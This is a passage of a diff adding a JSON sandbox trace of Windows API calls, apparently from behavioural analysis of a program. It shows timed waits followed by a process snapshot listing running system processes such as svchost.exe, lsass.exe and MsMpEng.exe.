true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "228" + } + ], + "repeated": 0, + "id": 2187 + }, + { + "timestamp": "2025-03-07 22:35:27,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2188 + }, + { + "timestamp": "2025-03-07 22:35:27,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "303" + } + ], + "repeated": 0, + "id": 2189 + }, + { + "timestamp": "2025-03-07 22:35:28,094", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2190 + }, + { + "timestamp": "2025-03-07 22:35:28,094", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "295" + } + ], + "repeated": 0, + "id": 2191 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x000004ec", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2192 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2193 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 2194 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 2195 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 2196 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 2197 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 2198 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 2199 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 2200 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 2201 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 2202 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 2203 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 2204 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 2205 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 2206 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 2207 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 2208 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 2209 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 2210 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 2211 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 2212 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 2213 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 2214 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 2215 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 2216 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 2217 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 2218 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 2219 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 2220 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 2221 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 2222 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 2223 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 2224 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 2225 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 2226 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 2227 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 2228 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 2229 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 2230 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 2231 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 2232 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 2233 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 2234 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 2235 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 2236 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 2237 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 2238 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 2239 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 2240 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 2241 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 2242 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 2243 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 2244 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 2245 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 2246 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 2247 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 2248 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 2249 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 2250 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 2251 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 2252 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 2253 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 2254 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 2255 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 2256 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 2257 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 2258 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 2259 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 0, + "id": 2260 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 2261 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 2262 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 2263 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 2264 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 2265 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 2266 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 2267 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], 